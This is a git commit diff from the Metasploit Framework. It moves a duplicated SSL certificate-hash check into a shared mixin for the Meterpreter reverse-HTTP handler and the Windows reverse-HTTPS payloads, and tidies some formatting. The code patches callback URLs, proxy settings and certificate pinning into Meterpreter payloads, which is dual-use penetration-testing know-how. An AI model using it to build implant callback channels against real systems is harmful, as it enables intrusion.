Create verify ssl mixin, adjust some formatting

2024-10-29 18:07:27 +01:00 · 2015-03-23 13:21:08 +10:00 · 2015-03-23 13:21:08 +10:00 · 9c9d333a1b
commit 9c9d333a1b
parent 9d20d057dd
5 changed files with 26 additions and 61 deletions
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@ -4,6 +4,7 @@ require 'rex/sync/ref'
 require 'msf/core/handler/reverse_http/uri_checksum'
 require 'rex/payloads/meterpreter/patch'
 require 'rex/parser/x509_certificate'
+require 'msf/core/payload/windows/verify_ssl'

 module Msf
 module Handler
@ -17,6 +18,7 @@ module ReverseHttp

  include Msf::Handler
  include Msf::Handler::ReverseHttp::UriChecksum
+  include Msf::Payload::Windows::VerifySsl

  #
  # Returns the string representation of the handler type
@ -292,13 +294,15 @@ protected

        blob = obj.stage_payload

+        verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                             datastore['HandlerSSLCert'])
        #
        # Patch options into the payload
        #
-        Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+        Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
          :ssl            => ssl?,
          :url            => url,
-          :ssl_cert_hash  => get_ssl_cert_hash,
+          :ssl_cert_hash  => verify_cert_hash,
          :expiration     => datastore['SessionExpirationTimeout'],
          :comm_timeout   => datastore['SessionCommunicationTimeout'],
          :ua             => datastore['MeterpreterUserAgent'],
@ -306,7 +310,7 @@ protected
          :proxy_port     => datastore['PayloadProxyPort'],
          :proxy_type     => datastore['PayloadProxyType'],
          :proxy_user     => datastore['PayloadProxyUser'],
-          :proxy_pass     => datastore['PayloadProxyPass']
+          :proxy_pass     => datastore['PayloadProxyPass'])

        resp.body = encode_stage(blob)

@ -357,20 +361,6 @@ protected
    port > 0 ? port : datastore['LPORT'].to_i
  end

-  def get_ssl_cert_hash
-    unless datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
-      return nil
-    end
-
-    unless datastore['HandlerSSLCert']
-      raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured"
-    end
-
-    hash = Rex::Parser::X509Certificate.get_cert_file_hash(datastore['HandlerSSLCert'])
-    print_status("Meterpreter will verify SSL Certificate with SHA1 hash #{hash.unpack("H*").first}")
-    hash
-  end
-
 end

 end
--- a/lib/msf/core/payload/windows/reverse_winhttps.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttps.rb
@ -2,7 +2,7 @@

 require 'msf/core'
 require 'msf/core/payload/windows/reverse_winhttp'
-require 'rex/parser/x509_certificate'
+require 'msf/core/payload/windows/verify_ssl'

 module Msf

@ -17,6 +17,7 @@ module Msf
 module Payload::Windows::ReverseWinHttps

  include Msf::Payload::Windows::ReverseWinHttp
+  include Msf::Payload::Windows::VerifySsl

  #
  # Register reverse_winhttps specific options
@ -49,7 +50,8 @@ module Payload::Windows::ReverseWinHttps
  #
  def generate

-    verify_cert_hash = get_ssl_cert_hash
+    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                         datastore['HandlerSSLCert'])

    # Generate the simple version of this stager if we don't have enough space
    if self.available_space.nil? || required_space > self.available_space
@ -97,23 +99,6 @@ module Payload::Windows::ReverseWinHttps
    space
  end

-  #
-  # Get the SSL hash from the certificate, if required.
-  #
-  def get_ssl_cert_hash
-    unless datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
-      return nil
-    end
-
-    unless datastore['HandlerSSLCert']
-      raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured"
-    end
-
-    hash = Rex::Parser::X509Certificate.get_cert_file_hash(datastore['HandlerSSLCert'])
-    print_status("Meterpreter will verify SSL Certificate with SHA1 hash #{hash.unpack("H*").first}")
-    hash
-  end
-
 end

 end
--- a/lib/rex/parser/x509_certificate.rb
+++ b/lib/rex/parser/x509_certificate.rb
@ -58,7 +58,7 @@ class X509Certificate

  #
  # Parse a certificate in unified PEM format and retrieve
-  #   the SHA1 hash.
+  # the SHA1 hash.
  #
  # @param [String] ssl_cert 
  # @return [String]
@ -74,7 +74,7 @@ class X509Certificate

  #
  # Parse a file that contains a certificate in unified PEM
-  #   format and retrieve the SHA1 hash.
+  # format and retrieve the SHA1 hash.
  #
  # @param [String] ssl_cert_file
  # @return [String]
--- a/lib/rex/payloads/meterpreter/patch.rb
+++ b/lib/rex/payloads/meterpreter/patch.rb
@ -99,12 +99,12 @@ module Rex
        # Patch options into metsrv for reverse HTTP payloads
        def self.patch_passive_service!(blob, options)

-          patch_transport! blob, options[:ssl]
-          patch_url! blob, options[:url]
-          patch_expiration! blob, options[:expiration]
-          patch_comm_timeout! blob, options[:comm_timeout]
-          patch_ua! blob, options[:ua]
-          patch_ssl_check! blob, options[:ssl_cert_hash]
+          patch_transport!(blob, options[:ssl])
+          patch_url!(blob, options[:url])
+          patch_expiration!(blob, options[:expiration])
+          patch_comm_timeout!(blob, options[:comm_timeout])
+          patch_ua!(blob, options[:ua])
+          patch_ssl_check!(blob, options[:ssl_cert_hash])
          patch_proxy!(blob,
            options[:proxy_host],
            options[:proxy_port],
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@ -16,6 +16,7 @@ module Metasploit3

  include Msf::Payload::Windows::StagelessMeterpreter
  include Msf::Sessions::MeterpreterOptions
+  include Msf::Payload::Windows::VerifySsl

  def initialize(info = {})

@ -55,10 +56,13 @@ module Metasploit3
      #  end
      #end

-      Rex::Payloads::Meterpreter::Patch.patch_passive_service! dll,
+      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                           datastore['HandlerSSLCert'])
+
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
        :url            => url,
        :ssl            => true,
-        :ssl_cert_hash  => get_ssl_cert_hash,
+        :ssl_cert_hash  => verify_cert_hash,
        :expiration     => datastore['SessionExpirationTimeout'].to_i,
        :comm_timeout   => datastore['SessionCommunicationTimeout'].to_i,
        :ua             => datastore['MeterpreterUserAgent'],
@ -66,24 +70,10 @@ module Metasploit3
        :proxyport      => datastore['PROXYPORT'],
        :proxy_type     => datastore['PROXY_TYPE'],
        :proxy_username => datastore['PROXY_USERNAME'],
-        :proxy_password => datastore['PROXY_PASSWORD']
+        :proxy_password => datastore['PROXY_PASSWORD'])
    end

  end

-  def get_ssl_cert_hash
-    unless datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
-      return nil
-    end
-
-    unless datastore['HandlerSSLCert']
-      raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured"
-    end
-
-    hash = Rex::Parser::X509Certificate.get_cert_file_hash(datastore['HandlerSSLCert'])
-    print_status("Meterpreter will verify SSL Certificate with SHA1 hash #{hash.unpack("H*").first}")
-    hash
-  end
-
 end